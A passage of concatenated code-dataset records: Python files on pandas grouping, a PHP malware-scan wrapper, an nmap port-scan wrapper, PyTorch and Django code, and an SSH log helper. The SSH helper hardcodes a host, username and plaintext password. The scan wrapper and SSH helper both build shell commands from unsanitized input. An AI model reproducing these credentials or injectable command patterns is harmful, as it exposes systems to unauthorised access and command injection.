[]\n for one_option in subunitselect.options:\n actual_options.append(one_option.text)\n self.assertListEqual(expected_options,actual_options)\n\n\n\n","sub_path":"Assignment123may.py","file_name":"Assignment123may.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"342223745","text":"##\n## Programación en Python\n## ===========================================================================\n##\n## Genere una lista de tuplas, donde cada tupla contiene en la primera \n## posicion, el valor de la segunda columna; la segunda parte de la \n## tupla es una lista con las letras (ordenadas y sin repetir letra) \n## de la primera columna que aparecen asociadas a dicho valor de la \n## segunda columna. Esto es:\n##\n## Rta/\n## ('0', ['C'])\n## ('1', ['A', 'B', 'D', 'E'])\n## ('2', ['A', 'D', 'E'])\n## ('3', ['A', 'B', 'D', 'E'])\n## ('4', ['B', 'E'])\n## ('5', ['B', 'C', 'D', 'E'])\n## ('6', ['A', 'B', 'C', 'E'])\n## ('7', ['A', 'C', 'D', 'E'])\n## ('8', ['A', 'B', 'E'])\n## ('9', ['A', 'B', 'C', 'E'])\n##\n## >>> Escriba su codigo a partir de este punto <<<\n##\nimport pandas as pd\nf = pd.read_csv(\"data.csv\", sep=\"\\t\", names=list(range(1,6)))\n\ndf = f.groupby(2)[1].apply(list)\n\nfor i in df.index:\n print(repr((str(i),sorted(list(set(df[i]))))))\n","sub_path":"03-python=1/q08=1/question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"87228334","text":"import os\nimport subprocess\nimport colorama \n\n\ndef tool (tool_name, dir) :\n if tool_name == \"malware_tools\" :\n cmd = \"./phpmalwarefinder \"+dir+ \"| sed -e '1,/You should take a look at the files listed below:/ d' | awk '{print $NF}'\"\n listIp= subprocess.run(cmd,text= True, shell = True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).stdout.splitlines()\n\n if not listIp : \n print (colorama.Fore.GREEN+\"No malicious files found in \"+dir+\"\\n\")\n elif listIp : \n print (colorama.Fore.CYAN+\" Malicous files detected \"+colorama.Fore.RESET+\"\\n\")\n for file in listIp :\n path_name = os.path.split(file) \n print (colorama.Fore.RESET+\"File path \"+colorama.Fore.RED+path_name[0]+colorama.Fore.RESET+\" and file name \"+colorama.Fore.RED+path_name[1]+colorama.Fore.RESET)\n \n\n\n\n\n\nif __name__ == \"__main__\": \n try : \n tool_name = input('Please specify the tool to use: ')\n directory = input('Please the directory to scan: ')\n tool (tool_name,directory)\n except : \n print (\"Error occured \")","sub_path":"maliciousfiledetectionc.py","file_name":"maliciousfiledetectionc.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"456511824","text":"\r\nclass Palindrome:\r\n # Longest Palindrome O(n^2)\r\n def longestPalindrome(self, s: str) -> str:\r\n start = 0\r\n end = 0\r\n\r\n for i in range(0, len(s)):\r\n len1 = self.expandAroundCenter(s, i, i)\r\n len2 = self.expandAroundCenter(s, i, i + 1)\r\n maxLen = max(len1, len2)\r\n\r\n if maxLen > end - start:\r\n start = i - (maxLen // 2)\r\n end = i + maxLen // 2\r\n\r\n return s[start : end + 1]\r\n\r\n def expandAroundCenter(self, s: str, i: int, j = int) -> int:\r\n left = i\r\n right = j\r\n while left >= 0 and right < len(s) and s[left] == s[right]:\r\n left -= 1\r\n right += 1\r\n return right - left - 1\r\n\r\npal = Palindrome()\r\nprint(pal.longestPalindrome('babad'))","sub_path":"python/arrays_strings/palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"13915801","text":"'''\nAuthor: Shuailin Chen\nCreated Date: 2020-11-27\nLast Modified: 2021-04-12\n'''\nimport os.path as osp\nimport matplotlib.pyplot as plt\nimport shutil\nimport cv2\nimport numpy as np\nimport os\n\nimport torch\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch.utils import data\n\nfrom ptsemseg.utils import get_logger\nfrom ptsemseg.metrics import runningScore, averageMeter\nfrom ptsemseg.augmentations import get_composed_augmentations\nfrom ptsemseg.loader import get_loader \nfrom ptsemseg.models import get_model\n\nimport args\nimport utils\nfrom mylib import types\n\n\n\ndef test(cfg, logger, run_id):\n # augmemtations \n augments = cfg.test.augments\n data_aug = get_composed_augmentations(augments)\n\n # dataloader\n data_loader = get_loader(cfg.data.dataloader)\n data_loader = data_loader(root=cfg.data.path, data_format=cfg.data.format, augments=cfg.test.augments, split=cfg.test.dataset)\n os.mkdir(osp.join(run_id, cfg.test.dataset))\n \n logger.info(f'data path: {cfg.data.path}')\n logger.info(f'num of {cfg.test.dataset} set samples: {len(data_loader)}')\n\n loader = data.DataLoader(data_loader,\n batch_size=cfg.test.batch_size, \n num_workers=cfg.test.n_workers, \n shuffle=False,\n persistent_workers=True,\n drop_last=False)\n\n # model\n model = get_model(cfg.model, n_classes=2)\n logger.info(f'using model: {cfg.model.arch}')\n device = f'cuda:{cfg.gpu[0]}'\n model=model.to(device)\n model = torch.nn.DataParallel(model, device_ids=cfg.gpu)\n\n # load model params\n if osp.isfile(cfg.test.pth):\n logger.info(\"Loading model from checkpoint '{}'\".format(cfg.test.pth))\n\n # load model state\n checkpoint = torch.load(cfg.test.pth)\n model.load_state_dict(checkpoint[\"model_state\"])\n # best_cls_1_acc_now = checkpoint[\"best_cls_1_acc_now\"]\n # best_cls_1_acc_iter_now = checkpoint[\"best_cls_1_acc_iter_now\"]\n else:\n raise FileNotFoundError(f'{cfg.test.pth} file not found')\n\n # Setup Metrics\n running_metrics_val = runningScore(2)\n running_metrics_train = runningScore(2)\n metrics = runningScore(2)\n\n # test\n model.eval()\n img_cnt = 0\n with torch.no_grad():\n for (file_a, file_b, label, mask) in loader:\n file_a = file_a.to(device) \n file_b = file_b.to(device) \n label = label.numpy()\n mask = mask.numpy()\n\n outputs = model(file_a, file_b)\n pred = outputs.max(1)[1].cpu().numpy()\n confusion_matrix_now = metrics.update(label, pred, mask)\n\n for idx, cm in enumerate(confusion_matrix_now):\n cm *=100\n pred_filename = osp.join(run_id, cfg.test.dataset, f'{img_cnt}_{cm[0, 0]:.2f}_{cm[1, 1]:.2f}_pred.png')\n gt_filename = osp.join(run_id, cfg.test.dataset, f'{img_cnt}_{cm[0, 0]:.2f}_{cm[1, 1]:.2f}_gt.png')\n img_cnt += 1\n\n if cv2.imwrite(pred_filename, (pred[idx, :, :]*255).astype(np.uint8)) and cv2.imwrite(gt_filename, (label[idx, :, :]*255).astype(np.uint8)):\n logger.info(f'writed {pred_filename}')\n else:\n logger.info(f'fail to writed {pred_filename}')\n\n score,_ = metrics.get_scores()\n # score_train,_ = running_metrics_train.get_scores()\n # score_val,_ = running_metrics_val.get_scores()\n acc = score['Acc']\n # acc_train = score_train['Acc']\n # acc_val = score_val['Acc']\n logger.info(f'acc : {acc}\\tOA:{acc.mean()}')\n micro_OA = score['Overall_Acc']\n miou = score['Mean_IoU']\n logger.info(f'overall acc: {micro_OA}, mean iou: {miou}')\n # logger.info(f'acc of train set: {acc_train} \\nacc of val set: {acc_val}')\n\n\n\nif __name__=='__main__':\n cfg = args.get_argparser('configs/psr_siamdiff_pauli.yml')\n del cfg.train\n torch.backends.cudnn.benchmark = True\n\n run_id = utils.get_work_dir(osp.join(cfg.test.out_path, osp.split(osp.split(cfg.test.pth)[0])[1]))\n # writer = SummaryWriter(log_dir=run_id)\n # config_fig = types.dict2fig(cfg.to_flatten_dict())\n # writer.add_figure('config', config_fig, close=True)\n # writer.flush()\n shutil.copy(cfg.config_file, run_id)\n\n # logger\n logger = get_logger(run_id)\n logger.info(f'RUN DIR: {run_id}')\n\n test(cfg, logger, run_id)\n logger.info(f'RUN DIR: {run_id}')","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"444435568","text":"#\n# @lc app=leetcode id=957 lang=python3\n#\n# [957] Prison Cells After N Days\n#\n\n# @lc code=start\n\n\nclass Solution:\n def prisonAfterNDays(self, cells: List[int], N: int) -> List[int]:\n\n seen = dict()\n is_fast_forwarded = False\n\n while N > 0:\n # we only need to run the fast-forward once at most\n if not is_fast_forwarded:\n state_key = tuple(cells)\n if state_key in seen:\n # the length of the cycle is seen[state_key] - N\n N %= seen[state_key] - N\n is_fast_forwarded = True\n else:\n seen[state_key] = N\n\n # check if there is still some steps remained,\n # with or without the fast-forwarding.\n if N > 0:\n N -= 1\n next_day_cells = self.nextDay(cells)\n cells = next_day_cells\n\n return cells\n\n def nextDay(self, cells: List[int]):\n ret = [0] # head\n for i in range(1, len(cells)-1):\n ret.append(int(cells[i-1] == cells[i+1]))\n ret.append(0) # tail\n return ret\n\n \n \n# @lc code=end\n\n","sub_path":"LeetCodePremium/957.prison-cells-after-n-days.py","file_name":"957.prison-cells-after-n-days.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"212200657","text":"# -*- coding: utf-8 *-*\n\nimport sqlalchemy\n\nfrom sqlalchemy.orm import scoped_session\nfrom sqlalchemy.orm.session import sessionmaker\n\nfrom zope.sqlalchemy.datamanager import ZopeTransactionExtension\n\n\ndef connection(settings, backend, db):\n bind = sqlalchemy.engine_from_config(settings, 'pyramid_db.backend.%s.%s.' % (backend, db))\n session = scoped_session(\n sessionmaker(\n autoflush=True, \n autocommit=False, \n bind=bind, \n extension=ZopeTransactionExtension()\n )\n )\n return session\n","sub_path":"pyramid_db/backends/backend_sqlalchemy.py","file_name":"backend_sqlalchemy.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"556646220","text":"import pathlib\nimport subprocess\nfrom time import sleep\nimport os\n\nfrom config_files.init_logger import logger\nfrom config_files.paths import PATH_TO_SH_SCRIPT_NAAUBU, PORTS_PATH\nfrom ports.nmap_output_parser import nmap_output_parser\n\n\ndef naabu_starter(full_command: list[str], nmap_output_path: pathlib.Path) -> list[str]:\n logger.info(\"Start port scan with nmap\")\n\n command = \" \".join(full_command)\n logger.info(f\"Run nmap command: {command}\")\n\n process_send_command = subprocess.run(\n full_command,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n if not process_send_command.returncode:\n logger.info(\n f\"Command done successfully. Return code: {process_send_command.returncode}\"\n )\n else:\n logger.error(\"nmap end with error\")\n raise ChildProcessError(f\"Error while execute nmap.\"\n f\" Naabu stdout: {process_send_command.stdout.decode('utf-8')}. \"\n f\"Naabu stderr: {process_send_command.stderr.decode('utf-8')}\")\n\n logger.info(f\"Nmap output stored to {nmap_output_path.as_uri()}\")\n nmap_output_as_xml = nmap_output_path.read_text()\n\n all_ports = nmap_output_parser(nmap_output_as_xml=nmap_output_as_xml)\n logger.info(f\"Parse nmap output DONE. Found: {len(all_ports)} open ports.\")\n\n nmap_output_path.unlink()\n logger.info(\"Nmap output as xml deleted\")\n\n return all_ports\n","sub_path":"ports/nmap_starter.py","file_name":"nmap_starter.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"397342841","text":"\"\"\"\nThe knowledge base embedding matrix is extremely large. We preprocess teh entity list to load only relevant entities.\n\"\"\"\n\nimport json\n\n\ndef prepare_embeddings():\n\n entity2idx = {}\n with open(\"../entity-linking/data/WikidataEmb/dec_17_50/\" + \"entity2id.txt\", 'r') as f:\n f.readline()\n for l in f.readlines():\n k, v = tuple(l.strip().split(\"\\t\"))\n entity2idx[k] = int(v)\n\n\n with open(\"data/data-annotations/train_entitylinking.json\") as f:\n data_annotations = json.load(f)\n\n with open(\"data/data-annotations/dev_entitylinking.json\") as f:\n data_annotations += json.load(f)\n\n with open(\"data/data-annotations/test_entitylinking.json\") as f:\n data_annotations += json.load(f)\n\n entity_ids = {e['linkings'][0][0] for l in data_annotations for s in l for e in s['entities'] if len(e['linkings']) > 0}\n\n entity2idx = [(k, v) for k, v in entity2idx.items() if k in entity_ids]\n print(len(entity2idx))\n\n entity2idx = [(k,v,i) for i, (k, v) in enumerate(entity2idx)]\n\n with open(\"data/entity2id.filtered.txt\", 'w') as out:\n for t in entity2idx:\n out.write(\"\\t\".join([str(el) for el in t]) + \"\\n\")\n\n\nif __name__ == '__main__':\n prepare_embeddings()","sub_path":"semanticparsing/wikidata/prepare_kb_embeddings.py","file_name":"prepare_kb_embeddings.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"425968746","text":"import pytest\n\nfrom myia import myia\nfrom myia.compile.backends import load_backend\nfrom myia.lib import Empty, HandleInstance, core\nfrom myia.operations import handle, handle_get, handle_set\nfrom myia.pipeline import standard_pipeline, steps\n\ntry:\n load_backend(\"relay\")\nexcept Exception:\n pytestmark = pytest.mark.skip(\"Requires relay\")\n\n\nupipeline = standard_pipeline.insert_after(\"parse\", resolve=steps.step_resolve)\n\n\ndef add_one(x):\n # Not universal, but should work from universal function\n return x + 1\n\n\n@core(use_universe=True)\ndef increment(h):\n return handle_set(h, add_one(handle_get(h)))\n\n\ndef test_increment():\n @myia(\n use_universe=True,\n backend=\"relay\",\n backend_options={\"exec_kind\": \"debug\"},\n pipeline=upipeline,\n )\n def plus4(x):\n h = handle(x)\n increment(h)\n increment(h)\n increment(h)\n increment(h)\n return handle_get(h)\n\n assert plus4(3) == 7\n assert plus4(10) == 14\n\n\ndef test_increment_interleave():\n @myia(\n use_universe=True,\n backend=\"relay\",\n backend_options={\"exec_kind\": \"debug\"},\n pipeline=upipeline,\n )\n def plus2(x, y):\n h1 = handle(x)\n h2 = handle(y)\n increment(h1)\n increment(h2)\n increment(h1)\n increment(h2)\n return handle_get(h1), handle_get(h2)\n\n assert plus2(3, 6) == (5, 8)\n assert plus2(10, -21) == (12, -19)\n\n\ndef test_increment_loop():\n @myia(\n use_universe=True,\n backend=\"relay\",\n backend_options={\"exec_kind\": \"debug\"},\n pipeline=upipeline,\n )\n def plus(x, y):\n h = handle(x)\n i = y\n while i > 0:\n increment(h)\n i = i - 1\n return handle_get(h)\n\n assert plus(3, 4) == 7\n assert plus(10, 13) == 23\n\n\ndef test_increment_recursion():\n @myia(\n use_universe=True,\n backend=\"relay\",\n backend_options={\"exec_kind\": \"debug\"},\n pipeline=upipeline,\n )\n def length(h, xs):\n if not isinstance(xs, Empty):\n increment(h)\n length(h, xs.tail)\n return handle_get(h)\n\n h = HandleInstance(0)\n hb = length.to_device(h)\n assert length(hb, [1, 2, 3, 4]) == 4\n\n\ndef test_give_handle():\n @myia(\n use_universe=True,\n backend=\"relay\",\n backend_options={\"exec_kind\": \"debug\"},\n pipeline=upipeline,\n )\n def plus(h, y):\n i = y\n while i > 0:\n increment(h)\n i = i - 1\n return handle_get(h)\n\n h1 = HandleInstance(0)\n h2 = HandleInstance(0)\n\n hb1 = plus.to_device(h1)\n hb2 = plus.to_device(h2)\n\n # handle is updated automatically\n assert plus(hb1, 4) == 4\n assert plus(hb2, 9) == 9\n assert plus(hb1, 30) == 34\n\n\ndef test_return_handle():\n @myia(\n use_universe=True,\n backend=\"relay\",\n backend_options={\"exec_kind\": \"debug\"},\n pipeline=upipeline,\n )\n def plus2(h):\n increment(h)\n increment(h)\n return h\n\n h = HandleInstance(0)\n hb = plus2.to_device(h)\n # This might return a BackendValue later but it seems\n # to return the handle for now.\n h2 = plus2(hb)\n assert h2.state == 2\n","sub_path":"tests/test_universal.py","file_name":"test_universal.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"531483802","text":"from __future__ import print_function\nfrom __future__ import division\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport numpy as np\nimport torchvision\nfrom torchvision import datasets,models,transforms\nimport matplotlib.pyplot as plt\nimport time\nimport os\nimport copy\nfrom torch.autograd import Variable\nfrom torchvision.models.resnet import ResNet\nfrom torchvision.models.resnet import BasicBlock\n\nprint(\"PyTorch Version: \",torch.__version__)\nprint(\"Torchvision Version\",torchvision.__version__)\n\ns_time = time.time()\ntorch.backends.cudnn.deterministic = True\n\ndata_dir = \"./fish3\"\n\n# Models to choose from [resnet, alexnet, vgg, squeezenet, densenet, inception]\nmodel_name = \"resnet\"\n\nnum_classes = 16\nbatch_size = 10\nnum_epochs = 30\n\nfeature_extract = True\n\ndef set_parameter_requires_grad(model,feature_extracting):\n if feature_extracting:\n for param in model.parameters():\n param.requires_grad = False\n\ndef initialize_model(model_name,num_class,feature_extract,use_pretrained=True):\n # Initialize these variables which will be set in this if statemment. Each of these variables is model specific\n model_ft = None\n input_size = 0\n\n if model_name == \"resnet\":\n # Use ResNet18 there\n model_ft = models.resnet18(pretrained=use_pretrained)\n set_parameter_requires_grad(model_ft,feature_extract)\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs,num_classes)\n input_size = 224\n elif model_name == \"alexnet\":\n model_ft = models.alexnet(pretrained=use_pretrained)\n set_parameter_requires_grad(model_ft,feature_extract)\n num_ftrs = model_ft.classifier[6].in_features\n model_ft.classifier[6] = nn.Linear(num_ftrs,num_classes)\n input_size = 224\n elif model_name == \"vgg\":\n # Use vgg11_bn\n model_ft = models.vgg11_bn(pretrained=use_pretrained)\n set_parameter_requires_grad(model_ft,feature_extract)\n num_ftrs = model_ft.classifier[6].in_features\n model_ft.classifier[6] = nn.Linear(num_ftrs,num_classes)\n input_size = 224\n elif model_name == \"squeezenet\":\n model_ft = models.squeezenet1_0(pretrained=use_pretrained)\n set_parameter_requires_grad(model_ft,feature_extract)\n model_ft.classifier[1] = nn.Conv2d(512,num_classes,kernel_size=(1,1))\n model_ft.num_classes = num_classes\n input_size = 224\n elif model_name == \"densenet\":\n model_ft = models.densenet121(pretrained=use_pretrained)\n set_parameter_requires_grad(model_ft,feature_extract)\n num_ftrs = model_ft.classifier.in_features\n model_ft.classifier = nn.Linear(num_ftrs,num_classes)\n input_size = 224\n elif model_name == \"inception\":\n # Inception v3. Expects (229,229) sized images and has auxiliary output\n model_ft = models.inception_v3(pretrained=use_pretrained)\n set_parameter_requires_grad(model_ft,feature_extract)\n # Handle the auxilary net\n num_ftrs = model_ft.AuxLogits.fc.in_features\n model_ft.AuxLogits.fc = nn.Linear(num_ftrs,num_classes)\n # Handle the primary net\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs,num_classes)\n input_size = 299\n else:\n print(\"Invalid model name, exiting...\")\n exit()\n return model_ft,input_size\n\ndef train_model(model,dataloaders,criterion,optimizer,num_epochs=25,is_inception=False):\n since = time.time()\n val_acc_history = []\n best_model_wts = copy.deepcopy(model.state_dict())\n best_acc = 0.0\n\n for epoch in range(num_epochs):\n print(\"Epoch {}/{}\".format(epoch+1,num_epochs))\n print(\"-\" * 10)\n\n # Each epoch has a training and validation phase\n for phase in [\"train\",\"val\"]:\n if phase == \"train\":\n model.train()\n else:\n model.eval()\n running_loss = 0.0\n running_corrects = 0\n\n # Iterate pver data\n s = 0\n for inputs, labels in dataloaders[phase]:\n s += 1\n inputs = Variable(inputs)\n labels = Variable(labels)\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward\n # track history if only in train\n with torch.set_grad_enabled(phase == \"train\"):\n # Get model outputs and calculate loss\n # Special case for inception because in tainiing it has an auxiliary output.\n # In train mode we calculate the loss by summing the final output and the auxiliary output\n # but in testing we only consider the final output\n if is_inception and phase == \"train\":\n outputs,aux_outputs = model(inputs)\n loss1 = criterion(outputs,labels)\n loss2 = criterion(aux_outputs,labels)\n loss = loss1 + loss2\n else:\n outputs = model(inputs)\n loss = criterion(outputs,labels)\n _,preds = torch.max(outputs,1)\n\n # Show images\n if phase == \"val\" and epoch == num_epochs-1:\n filename = \"./fish_result2/figure_%s.jpg\"%s\n imshow(inputs,labels,preds,classes=image_datasets[\"val\"].classes,filename=filename)\n print(image_datasets[\"val\"].classes)\n\n # backward and optimize\n if phase == \"train\":\n loss.backward()\n optimizer.step()\n\n # statistics\n running_loss += loss.item() * inputs.size(0)\n running_corrects += torch.sum(preds == labels.data)\n epoch_loss = running_loss / len(dataloaders[phase].dataset)\n epoch_acc = running_corrects.double() / len(dataloaders[phase].dataset)\n\n print(\"{} loss: {:.4f} Acc {:.4f}\".format(phase,epoch_loss,epoch_acc))\n\n # deep copy the model\n if phase == \"val\" and epoch_acc > best_acc:\n best_acc = epoch_acc\n best_model_wts = copy.deepcopy(model.state_dict())\n if phase == \"val\":\n val_acc_history.append(epoch_acc)\n time_elapsed = time.time() - since\n print(\"Training complete in {:.0f}m {:.0f}s\".format(time_elapsed // 60,time_elapsed % 60))\n print(\"Best val Acc: {:4f}\".format(best_acc))\n\n # Load best model weights\n model.load_state_dict(best_model_wts)\n return model,val_acc_history\n\ndef imshow(inputs,labels,preds,classes,filename):\n # Imshow for Tensor\n mean = np.array([0.485, 0.456, 0.406])\n std = np.array([0.229, 0.224, 0.225])\n images_so_far = 0\n num_images = 9\n fig = plt.figure(figsize=(10,10))\n for i in range(inputs.size()[0]):\n images_so_far += 1\n data = inputs[i].cpu().data\n data = data.numpy().transpose((1,2,0))\n inp = std * data + mean\n inp = np.clip(inp,0,1)\n title = \"Predicted:{} \\n Real: {}\".format(classes[preds[i]],classes[labels[i]])\n y = fig.add_subplot(3, 3, images_so_far)\n y.imshow(inp)\n plt.title(title,fontsize=8)\n plt.setp(y.get_xticklabels(), visible=False)\n plt.setp(y.get_yticklabels(), visible=False)\n plt.pause(0.001)\n plt.savefig(filename)\n if images_so_far == num_images:\n break\n# Inititalize the model for current run\nmodel_ft,input_size = initialize_model(model_name,num_classes,feature_extract,use_pretrained=True)\nprint(model_ft)\n\ndata_transforms = {\n \"train\":transforms.Compose([\n transforms.Resize((input_size,input_size)),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.485,0.456,0.406],[0.229,0.224,0.225])\n ]),\n \"val\":transforms.Compose([\n transforms.Resize((input_size,input_size)),\n transforms.ToTensor(),\n transforms.Normalize([0.485,0.456,0.406],[0.229,0.224,0.225])\n ])\n}\n\nprint(\"Initializing Datasets and Dataloaders...\")\n\n# Create training and validation datasets\nimage_datasets = {x:datasets.ImageFolder(os.path.join(data_dir,x), data_transforms[x]) for x in [\"train\",\"val\"]}\n# Create training and validation dataloaders\ndataloaders_dict = {x:torch.utils.data.DataLoader(image_datasets[x],batch_size=batch_size,shuffle=True,num_workers=0) for x in [\"train\",\"val\"]}\n# device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\ndevice = torch.device(\"cuda:0\")\n# Send model to GPU\nmodel_ft = model_ft.to(device)\n\n\"\"\" \n Gather the parameters to be optimized/updated in this run. If we do finetuning we will \n update all parameters of many layers that we want to change. However, if we do feature\n extracting, we will only update the parameters that we have just initialized, i.e. the \n parameters with requires_grad is True\n\"\"\"\nparams_to_update = model_ft.parameters()\nprint(\"Params to learn: \")\nif feature_extract:\n params_to_update = []\n for name,param in model_ft.named_parameters():\n if param.requires_grad == True:\n params_to_update.append(param)\n print(\"\\t\",name)\nelse:\n for name,param in model_ft.named_parameters():\n if param.requires_grad == True:\n print(\"\\t\",name)\n\n# Observe that all parameters are being optimized\noptimizer_ft = optim.Adam(params_to_update,lr=0.001)\n#optimizer_ft = optim.SGD(params_to_update,lr=0.001,momentum=0.9)\n\n# Set the loss function\ncriterion = nn.CrossEntropyLoss()\n\n# Train and evaluate\nmodel_ft,hist = train_model(model_ft,dataloaders_dict,criterion,optimizer_ft,\n num_epochs=num_epochs,is_inception=(model_name==\"inception\"))\n\nohist = [h.cpu().numpy() for h in hist]\nplt.figure()\nplt.plot(range(1,num_epochs+1),ohist,label=\"Pretrained\")\nplt.ylim((0,1.))\nplt.title(\"Accuracy\")\nplt.xlabel(\"Training Epochs\")\nplt.ylabel(\"Validation Accuracy\")\nplt.xticks(np.arange(1,num_epochs+1,1.0))\nplt.legend()\nplt.show()\nprint(time.time()-s_time)","sub_path":"fish_discrimination.py","file_name":"fish_discrimination.py","file_ext":"py","file_size_in_byte":10252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"152163150","text":"# -*- coding: utf-8 -*-\nfrom django.db.models.signals import post_save, post_delete\nfrom django.dispatch import receiver\nfrom payments.models import Payments\nfrom account.models import Account, Rel_Acc_Cont\nfrom invoice.models import Invoice\nfrom decimal import *\n'''\nОбработчик баланса для клиента\n'''\n\n\n@receiver([post_save, post_delete], sender=Payments)\ndef recalculation_payments_for_account(sender, instance, **kwargs):\n account = instance.account_id\n account_id = instance.account_id_id\n total_payments_sum = Decimal(0)\n if account_id:\n payments_objects = Payments.objects.filter(account_id=account, status=\"Оплачено\")\n for payment in payments_objects.all():\n total_payments_sum = float(total_payments_sum) + float(payment.invoice_amount)\n account_edit = Account.objects.get(row_id=account_id)\n account_edit.payments_amount_total = total_payments_sum\n account_edit.total_balance = float(account_edit.payments_amount_total) - float(account_edit.invoices_amount_total)\n account_edit.save()\n\n\n@receiver([post_save, post_delete], sender=Invoice)\ndef recalculation_invoices_for_account(sender, instance, **kwargs):\n account = instance.account_name\n account_id = instance.account_name_id\n total_invoices_sum = Decimal(0)\n if account_id:\n invoices_objects = Invoice.objects.filter(account_name=account)\n for invoice in invoices_objects.all():\n total_invoices_sum = float(total_invoices_sum) + float(invoice.total)\n account_edit = Account.objects.get(row_id=account_id)\n account_edit.invoices_amount_total = total_invoices_sum\n account_edit.total_balance = float(account_edit.payments_amount_total) - float(account_edit.invoices_amount_total)\n account_edit.save()\n\n\n'''\nПри создании клиента добавляется создатель-работник\n'''\n","sub_path":"account/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"11062339","text":"#-*- coding: utf-8 -*-\nimport json\nimport paramiko\nimport sys\nfrom script.tools import logger\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\n\ndef ssh2(grepInfo=None):\n con_dicts = {}\n data = []\n IP = \"10.10.252.155\"\n PORT = 6222\n USERNAME = \"xianping.wen\"\n PWD = \"qazWSX1995!\"\n TIME_OUT = 5\n try:\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(IP, port=PORT, username=USERNAME, password=PWD, timeout=TIME_OUT)\n if grepInfo is None:\n cmd = 'list |grep sh'\n else:\n cmd = 'list |grep sh|grep {}'.format(grepInfo)\n stdin, stdout, stderr = ssh.exec_command(cmd)\n out = stdout.readlines()\n id = 1\n for o in out:\n con_list = []\n con_dict = {}\n for i in str(o).split(\" \"):\n if i is not \"\":\n con_list.append(i.strip(\"\\n\"))\n con_dict[\"id\"] = id\n con_dict[\"ip\"] = con_list[1]\n con_dict[\"name\"] = con_list[2]\n data.append(con_dict)\n id += 1\n con_dicts[\"data\"] = data\n logger.log(con_dicts)\n return json.dumps(con_dicts)\n except Exception as e:\n logger.log(e)\n finally:\n ssh.close()\n\n\nif __name__=='__main__':\n s = ssh2()\n print(s)","sub_path":"script/tools/get_log/get_log.py","file_name":"get_log.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"188906837","text":"from flask import session, flash\nfrom flask import g\nfrom flask_login import current_user\nfrom flask_wtf import FlaskForm\nfrom wtforms import PasswordField, StringField, SubmitField, BooleanField, SelectField, FieldList\n\nfrom data import db_session\nfrom data.cl_const import Const\nfrom data.db_class_courses import Courses\nfrom data.db_class_days import Days\nfrom data.db_class_groups import Groups\nfrom data.db_class_kabs import Kabs\n\n\nclass NewRasp(FlaskForm):\n idGroups = SelectField(u'Учебная группа:', coerce=int)\n idKabs = SelectField(u'Кабинет:', coerce=int)\n idDays = SelectField(u'День недели:', coerce=int)\n tstart = StringField(u'Начало:')\n tend = StringField(u'Окончание:')\n name = StringField(u'Наименование:')\n comment = StringField(u'Доп.информация:')\n bb_submit = SubmitField(u'Сохранить')\n bb_cancel = SubmitField(u'Отменить')\n\n def __init__(self, *args, **kwargs):\n super(NewRasp, self).__init__(*args, **kwargs)\n # try:\n # with db_session.create_session() as db_sess:\n # try:\n grps = g.db_sess.query(Groups).join(Courses).\\\n filter(Groups.idUsers == current_user.id, Courses.year == Const.YEAR).\\\n order_by(Groups.name)\n # except Exception as err:\n # grps = None\n # flash(f\"Ошибка обработки SQL\", category='error')\n self.idGroups.choices = [(rec.id, rec.name) for rec in grps]\n self.idGroups.data = kwargs.get('idGroups', 0)\n # Кабинет\n try:\n kabs = g.db_sess.query(Kabs).order_by(Kabs.id)\n except Exception as err:\n kabs = None\n flash(f\"Ошибка обработки SQL\", category='error')\n self.idKabs.choices = [(gg.id, u\"%s\" % f'{gg.name}') for gg in kabs]\n self.idKabs.data = kwargs.get('idKabs', 0)\n # День недели\n try:\n week_day = g.db_sess.query(Days).order_by(Days.id)\n except Exception as err:\n week_day = None\n flash(f\"Ошибка обработки SQL\", category='error')\n self.idDays.choices = [(gg.id, u\"%s\" % f'{gg.name}') for gg in week_day]\n self.idDays.data = kwargs.get('idDays', 0)\n # except Exception as err:\n # db_sess = None\n # flash(f\"Ошибка обработки SQL\", category='error')\n self.tstart.data = 